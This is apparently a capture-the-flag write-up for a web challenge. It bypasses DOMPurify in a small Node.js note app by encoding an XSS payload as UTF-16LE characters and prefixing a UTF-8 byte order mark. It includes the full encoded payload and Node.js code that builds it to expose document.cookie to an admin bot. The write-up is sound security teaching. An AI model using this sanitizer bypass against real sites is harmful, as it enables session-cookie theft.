These XSS vectors are getting ridiculous! So I made a secure note app. The only NPM dependency is DOMPurify, and I directly store the output of DOMPurify.sanitize and serve that back, so it has to be secure, right? It’s barely 16 LoC!

Category: Web

Solver: aes, lukasrad02

Flag: GPNCTF{UN1C0D3_15_4_N34T_4TT4CK_V3CT0R}

Writeup

As the challenge description suggests, the code for this challenge is indeed pretty compact. Thus, we can even take a look at it here in this writeup:

const DOMPurify = require('dompurify')(new (require('jsdom').JSDOM)('').window); // the only dependency!
require('fs').mkdirSync('notes', { recursive: true });
require('http').createServer((req, res) => { try {
    if (req.url === "/") {
        res.setHeader('Content-Type', 'text/html');
        res.end(`<textarea id="content"></textarea><br><button onclick="location='/submit?'+encodeURIComponent(content.value)">Submit`)
    } else if (req.url.startsWith("/submit")) {
        const content = decodeURIComponent(req.url.split('submit?')[1]);
        const id = require('crypto').randomBytes(16).toString('hex');
        console.log("Unsanitized", content)
        const sanitized = DOMPurify.sanitize(content)
        require('fs').writeFileSync(`notes/${id}.html`, sanitized, "utf-16le");
        console.log("Sanitized", sanitized)
        res.setHeader("Location", `/notes/${id}`); res.statusCode = 302; res.end();
    } else if (req.url.startsWith("/notes/")) {
        const id = (req.url.split('/notes/')[1]).match(/^[a-f0-9]{32}$/);
        res.setHeader('Content-Type', 'text/html; charset=utf-16le');
        res.end(require('fs').readFileSync(`notes/${id}.html`));
} } catch(e) {console.log(e)}}).listen(1337);

As we can see, there are only two HTTP routes that might be interesting to us. There is the /submit route that sanitizes and stores a note we submit and there is the /notes/ route that serves a stored note for an ID we provide.

When starting an instance of this challenge, we are provided with a URL for both the application server and an admin bot. This hints that we are working with a typical XSS attack where we must gain access to the cookie of the browser context of the bot.

In the application code, there are two things that stood out to us immediately: The input is sanitized using DOMPurify, and we are working with the (pretty non-standard) UTF-16LE string encoding.

DOMPurify is what prevents us from running any JavaScript code (unless we found a vulnerability in the library, but that is pretty unlikely and certainly not in scope). So, we need to find a way to circumvent this. Relatively quickly, we assumed that the text encoding must be the attack vector here.

The general idea for the exploit we came up with was as follows: We need to find a way to encode and send a string that, when analyzed by DOMPurify, does not look suspicious. When it is later served to and interpreted by the browser, it should be interpreted as valid HTML/JavaScript code that runs.

We started by constructing a string that, when stored as UTF-16LE and interpreted as UTF-8, results in valid HTML and JavaScript. This was surprisingly easy to achieve, and CyberChef proved incredibly useful for it. We simply take the string we want the browser to see and decode its bytes as UTF-16LE to obtain the characters we need to submit.
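The same conversion can be sketched in Node.js instead of CyberChef. This is a minimal illustration rather than the tooling we actually used; the variable names are our own, and it assumes the payload is pure ASCII with an even byte count.

```javascript
// Sketch: reproduce the CyberChef "decode as UTF-16LE" step in Node.js.
// `wanted` is the markup the browser should end up seeing.
const wanted = '<html><head></head><body><script>document.write("Cookie:" + document.cookie);</script></body></html>';

// ASCII is a subset of UTF-8, so these are the bytes we want on disk.
const wantedBytes = Buffer.from(wanted, 'utf8');

// UTF-16LE consumes two bytes per code unit, so the length must be even.
if (wantedBytes.length % 2 !== 0) {
    throw new Error('pad the payload to an even number of bytes');
}

// Reinterpret the same bytes as UTF-16LE text: this is the note to submit.
const note = wantedBytes.toString('utf16le');

// The server's writeFileSync(..., "utf-16le") performs the reverse mapping,
// so the stored file contains exactly the bytes we started with.
const stored = Buffer.from(note, 'utf16le');
console.log(stored.equals(wantedBytes)); // true
```

Every pair of ASCII bytes becomes one (mostly CJK) character, which is why the note looks like harmless text to the sanitizer.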

CyberChef decoding an XSS payload as UTF-16LE

When we send this payload to the server and take a look at the file that is stored there, we can see that DOMPurify did not modify anything and the stored data corresponds to our payload when interpreted as UTF-8:

3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65  |<html><head></he|
61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74  |ad><body><script|
3e 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28  |>document.write(|
22 43 6f 6f 6b 69 65 3a 22 20 2b 20 64 6f 63 75  |"Cookie:" + docu|
6d 65 6e 74 2e 63 6f 6f 6b 69 65 29 3b 3c 2f 73  |ment.cookie);</s|
63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68  |cript></body></h|
74 6d 6c 3e                                      |tml>|

However, when we try to access that file in our browser by providing the note ID, we find that the browser also interprets the response as UTF-16LE. Thus, it displays the characters we originally sent instead of executing the XSS payload. This is because the server properly sets the charset in the Content-Type header, so the browser knows which encoding it is working with.

At this point, we were stuck for quite a while. We knew that we would somehow need to convince the browser to interpret the response as UTF-8 or ASCII to run our exploit. We also knew that browsers use a number of heuristics to determine the encoding of a file returned from the server. We believed that the header from the server would take precedence in all cases, but we checked which other methods are used anyway. The Wikipedia article on HTML encoding discusses a number of methods and references the HTML standard, where a “sniffing algorithm” is defined [1]. What we found is that a Byte Order Mark (BOM) has the highest precedence in determining the encoding of a file, even overriding the HTTP header value. As the BOM is part of the requested file itself, and we control the file contents, this seemed like the attack vector we should pursue.

So, what exactly is a BOM? The Byte Order Mark helps string decoders detect which encoding they are working with. To do this, they inspect the first few bytes of a file and check whether they match the BOM of any text encoding they know. Thus, if we set the first three bytes of the file returned via HTTP to the UTF-8 BOM (EF BB BF) [2], the browser will interpret the rest of the file as UTF-8.
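To make the precedence rule concrete, here is a simplified sketch of a BOM check in JavaScript. The function names `sniffBom` and `effectiveEncoding` are hypothetical and not taken from any browser. The real algorithm in the standard has more steps; this only models the part relevant here, namely that a recognized BOM wins over the charset from the Content-Type header.

```javascript
// Simplified, hypothetical model of BOM sniffing (not actual browser code).
function sniffBom(bytes) {
    if (bytes.length >= 3 && bytes[0] === 0xef && bytes[1] === 0xbb && bytes[2] === 0xbf) {
        return 'utf-8';
    }
    if (bytes.length >= 2 && bytes[0] === 0xfe && bytes[1] === 0xff) {
        return 'utf-16be';
    }
    if (bytes.length >= 2 && bytes[0] === 0xff && bytes[1] === 0xfe) {
        return 'utf-16le';
    }
    return null; // no BOM found
}

// A BOM, if present, overrides the charset declared in the HTTP header.
function effectiveEncoding(bytes, headerCharset) {
    return sniffBom(bytes) ?? headerCharset;
}

// A regular note stored by the server: no BOM, so the header decides.
const plain = Buffer.from('<b>hi</b>', 'utf16le');
// A file that starts with the UTF-8 BOM: the header is ignored.
const withBom = Buffer.concat([Buffer.from([0xef, 0xbb, 0xbf]), Buffer.from('<b>hi</b>', 'utf8')]);

console.log(effectiveEncoding(plain, 'utf-16le'));   // utf-16le
console.log(effectiveEncoding(withBom, 'utf-16le')); // utf-8
```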

With this, we can construct our complete payload. We again use CyberChef, this time adding the URL Decode operation so that we can combine hex-encoded bytes (the BOM) with normal strings in a single input. We also added an x in the middle to ensure that the total number of bytes is even, so that the payload is properly aligned for UTF-16 encoding.

CyberChef constructing the complete payload from the URL-encoded input

What we place in the CyberChef input is the following:

%ef%bb%bf<html><head></head><body>x<script>document.write("Cookie:" %2b document.cookie);</script></body></html>

The result is the following:

믯㲿瑨汭㰾敨摡㰾栯慥㹤戼摯㹹㱸捳楲瑰搾捯浵湥⹴牷瑩⡥䌢潯楫㩥•‫潤畣敭瑮挮潯楫⥥㰻猯牣灩㹴⼼潢祤㰾栯浴㹬
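The CyberChef recipe can also be approximated in Node.js. The following is a sketch under a few assumptions: the variable names are ours, the submit path mirrors what the challenge's own form generates, and DOMPurify is not run here, so the round trip only models the server's decoding and UTF-16LE encoding steps.

```javascript
// Sketch: build the final note (UTF-8 BOM + padded XSS payload).
const BOM_UTF8 = Buffer.from([0xef, 0xbb, 0xbf]);
const html = '<html><head></head><body>x<script>document.write("Cookie:" + document.cookie);</script></body></html>';

// 3 BOM bytes + 101 payload bytes = 104 bytes; the "x" makes the total even.
const bytes = Buffer.concat([BOM_UTF8, Buffer.from(html, 'utf8')]);
if (bytes.length % 2 !== 0) {
    throw new Error('odd byte count: adjust the padding');
}

// Reinterpret the bytes as UTF-16LE text; this is the note we submit.
const note = bytes.toString('utf16le');

// Same request path the challenge's submit button produces.
const submitPath = '/submit?' + encodeURIComponent(note);

// Model the server side without the sanitizer: decode, then store as UTF-16LE.
const received = decodeURIComponent(submitPath.split('submit?')[1]);
const storedFile = Buffer.from(received, 'utf16le');

console.log(storedFile.equals(bytes)); // true
console.log(storedFile.subarray(0, 3).toString('hex')); // efbbbf
```

Because the stored file now begins with EF BB BF, the browser decodes it as UTF-8 despite the charset in the response header.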

When we now store that note on the server and provide the admin bot with the note ID, we receive the flag as a screenshot from the admin bot browser.